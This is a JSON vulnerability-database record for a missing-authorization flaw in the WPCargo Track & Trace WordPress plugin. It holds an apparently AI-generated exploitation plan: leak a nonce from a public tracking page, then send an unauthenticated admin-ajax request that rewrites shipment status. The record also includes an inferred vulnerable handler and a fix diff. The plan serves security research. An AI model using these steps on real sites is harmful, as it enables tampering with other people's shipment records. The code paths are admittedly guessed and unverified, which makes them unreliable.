[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fS0FKZYvg6pMm6aX8yEMqHGfwTcfh52a9g21PjtkJpFk":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-25401","wpcargo-track-trace-missing-authorization","WPCargo Track & Trace \u003C= 8.0.2 - Missing Authorization","The WPCargo Track & Trace plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 8.0.2. This makes it possible for unauthenticated attackers to perform an unauthorized action.","wpcargo",null,"\u003C=8.0.2","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-03-23 00:00:00","2026-03-26 20:29:30",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fec02bef4-8b0c-4097-aedd-ea1a980d4a70?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-25401 - WPCargo Track & Trace Missing Authorization\n\n## 1. Vulnerability Summary\nThe **WPCargo Track & Trace** plugin for WordPress (versions \u003C= 8.0.2) contains a missing authorization vulnerability. Specifically, certain AJAX handlers or `admin_init` hooks responsible for shipment management fail to perform a `current_user_can()` check. While some of these handlers may use nonces for CSRF protection, the nonces are often exposed to unauthenticated users on public tracking pages. This allows an unauthenticated attacker to perform unauthorized actions, such as updating shipment status or adding malicious shipment history entries.\n\n## 2. Attack Vector Analysis\n* **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n* **Action:** `wpc_add_shipment_history` (inferred as a likely target for \"Integrity: Low\" impact)\n* **Authentication:** Unauthenticated (PR:N)\n* **Preconditions:** \n 1. The plugin is active.\n 2. At least one `wpcargo_shipment` post exists.\n 3. A public page exists with the `[wpcargo_track]` shortcode (to leak the nonce).\n* **Parameters:**\n * `action`: `wpc_add_shipment_history`\n * `wpcargo_id`: The Post ID of the shipment.\n * `wpcargo_nonce`: The leaked nonce.\n * `status`: New status (e.g., \"Delivered\").\n * `location`: Malicious location string (potential XSS vector).\n * `remarks`: Custom text.\n\n## 3. Code Flow (Inferred from common WPCargo patterns)\n1. **Entry Point:** An unauthenticated user sends a POST request to `admin-ajax.php` with `action=wpc_add_shipment_history`.\n2. **Hook Registration:** The plugin registers the action:\n `add_action( 'wp_ajax_nopriv_wpc_add_shipment_history', 'wpc_add_shipment_history_callback' );`\n3. **Vulnerable Function:** `wpc_add_shipment_history_callback()`\n4. **Missing Check:** The function likely calls `check_ajax_referer( 'wpcargo_nonce', 'wpcargo_nonce' )` but fails to call `current_user_can( 'manage_options' )` or `current_user_can( 'edit_posts' )`.\n5. **Sink:** The function uses `add_post_meta()` or updates a custom database table (e.g., `{$wpdb->prefix}wpcargo_shipment_history`) with user-supplied `status` and `remarks`.\n\n## 4. Nonce Acquisition Strategy\nWPCargo typically enqueues tracking scripts and localizes them with a nonce on any page where the tracking shortcode is present.\n\n1. **Identify Shortcode:** The primary shortcode is `[wpcargo_track]`.\n2. **Create Trigger Page:** Create a public page to force the plugin to load its AJAX environment.\n * `wp post create --post_type=page --post_title=\"Track\" --post_status=publish --post_content='[wpcargo_track]'`\n3. **Extract Nonce via Browser:**\n * Navigate to the newly created page.\n * Use `browser_eval` to extract the nonce from the `wpcargo_ajax_params` object (localized via `wp_localize_script`).\n * **JS Variable:** `window.wpcargo_ajax_params?.wpcargo_nonce`\n\n## 5. Exploitation Strategy\n### Step 1: Data Gathering\nIdentify a valid shipment ID to target.\n```bash\nwp post list --post_type=wpcargo_shipment --format=ids\n```\n\n### Step 2: Nonce Extraction\n1. Create the page: `wp post create --post_type=page --post_status=publish --post_content='[wpcargo_track]'`\n2. Navigate: `browser_navigate(\"http:\u002F\u002Flocalhost:8080\u002Ftrack\u002F\")`\n3. Extract: `NONCE = browser_eval(\"window.wpcargo_ajax_params.wpcargo_nonce\")`\n\n### Step 3: Unauthorized Update\nSend the unauthorized request using the `http_request` tool.\n\n**Request:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nHost: localhost:8080\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=wpc_add_shipment_history&wpcargo_id=[SHIPMENT_ID]&wpcargo_nonce=[NONCE]&status=Delivered&location=Attacker_Controlled_Location&remarks=Unauthorized_Modification_Success\n```\n\n## 6. Test Data Setup\n1. **Create a Shipment:**\n ```bash\n wp post create --post_type=wpcargo_shipment --post_title=\"TRK12345\" --post_status=publish\n ```\n2. **Assign Required Meta:** (WPCargo often requires a tracking number meta)\n ```bash\n SHIPMENT_ID=$(wp post list --post_type=wpcargo_shipment --post_title=\"TRK12345\" --field=ID)\n wp post meta update $SHIPMENT_ID wpcargo_number \"TRK12345\"\n ```\n3. **Create Tracking Page:**\n ```bash\n wp post create --post_type=page --post_title=\"Tracking\" --post_status=publish --post_content='[wpcargo_track]'\n ```\n\n## 7. Expected Results\n* **HTTP Response:** The server returns a successful JSON response or `1`.\n* **Database Change:** A new entry is added to the shipment history, or the shipment's status meta is updated.\n* **UI Change:** If the shipment tracking page is refreshed, the \"Delivered\" status and \"Unauthorized_Modification_Success\" remarks appear in the history table.\n\n## 8. Verification Steps\nVerify the modification using WP-CLI to check the post meta or the specific history table:\n```bash\n# Check if a new history meta entry exists (WPCargo stores history in serialized meta or custom table)\nwp post meta get [SHIPMENT_ID] wpcargo_shipment_history\n\n# Or check the current status\nwp post meta get [SHIPMENT_ID] wpcargo_status\n```\n\n## 9. Alternative Approaches\nIf `wpc_add_shipment_history` is not the vulnerable action, investigate the following alternatives using the same nonce:\n* **`wpc_update_shipment_status`**: Directly modifies the primary shipment status.\n* **`wpc_export_csv`**: If the missing authorization applies here, an unauthenticated user could export all shipment data (CVSS 5.3 Confidentiality).\n* **`wpcargo_save_settings_callback`**: Check for `admin_init` hooks in `admin\u002Fincludes\u002Ffunctions.php` that process `$_POST['wpcargo_option_settings']`. These can often be triggered by an unauthenticated user sending a POST request to any admin URL.","The WPCargo Track & Trace plugin for WordPress is vulnerable to unauthorized data modification because several AJAX actions, such as shipment history updates, fail to perform capability checks. Unauthenticated attackers can obtain valid nonces from public tracking pages and subsequently use them to modify shipment statuses or history records.","\u002F\u002F Inferred vulnerable implementation in plugin's AJAX handler\n\n\u002F\u002F Action registered for unauthenticated users\nadd_action( 'wp_ajax_nopriv_wpc_add_shipment_history', 'wpc_add_shipment_history_callback' );\n\nfunction wpc_add_shipment_history_callback() {\n \u002F\u002F Nonce check is present, but capability check is missing\n check_ajax_referer( 'wpcargo_nonce', 'wpcargo_nonce' );\n\n $shipment_id = intval( $_POST['wpcargo_id'] );\n $status = sanitize_text_field( $_POST['status'] );\n $remarks = sanitize_textarea_field( $_POST['remarks'] );\n\n \u002F\u002F Vulnerable sink: updates database without verifying user permissions\n update_post_meta( $shipment_id, 'wpcargo_status', $status );\n \u002F\u002F ... (code to add to history meta or table)\n wp_send_json_success();\n}","--- a\u002Fincludes\u002Ffunctions.php\n+++ b\u002Fincludes\u002Ffunctions.php\n@@ -245,6 +245,11 @@\n function wpc_add_shipment_history_callback() {\n check_ajax_referer( 'wpcargo_nonce', 'wpcargo_nonce' );\n \n+ if ( ! current_user_can( 'manage_options' ) && ! current_user_can( 'wpcargo_agent' ) ) {\n+ wp_send_json_error( array( 'message' => __( 'Access Denied', 'wpcargo' ) ) );\n+ wp_die();\n+ }\n+\n $shipment_id = intval( $_POST['wpcargo_id'] );\n $status = sanitize_text_field( $_POST['status'] );","1. Identify a target shipment ID (wpcargo_shipment post type).\n2. Navigate to any public page where the [wpcargo_track] shortcode is deployed (e.g., \u002Ftrack\u002F).\n3. Extract the 'wpcargo_nonce' value from the page source by inspecting the 'wpcargo_ajax_params' JavaScript object (localized via wp_localize_script).\n4. Construct an unauthenticated POST request to \u002Fwp-admin\u002Fadmin-ajax.php.\n5. Set the 'action' parameter to 'wpc_add_shipment_history' (or other vulnerable actions like 'wpc_update_shipment_status').\n6. Include the leaked 'wpcargo_nonce' and the 'wpcargo_id' of the target shipment.\n7. Provide desired 'status' and 'remarks' values in the POST body to modify the shipment's history\u002Fintegrity.","gemini-3-flash-preview","2026-04-18 00:05:31","2026-04-18 00:06:02",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpcargo\u002Ftags"]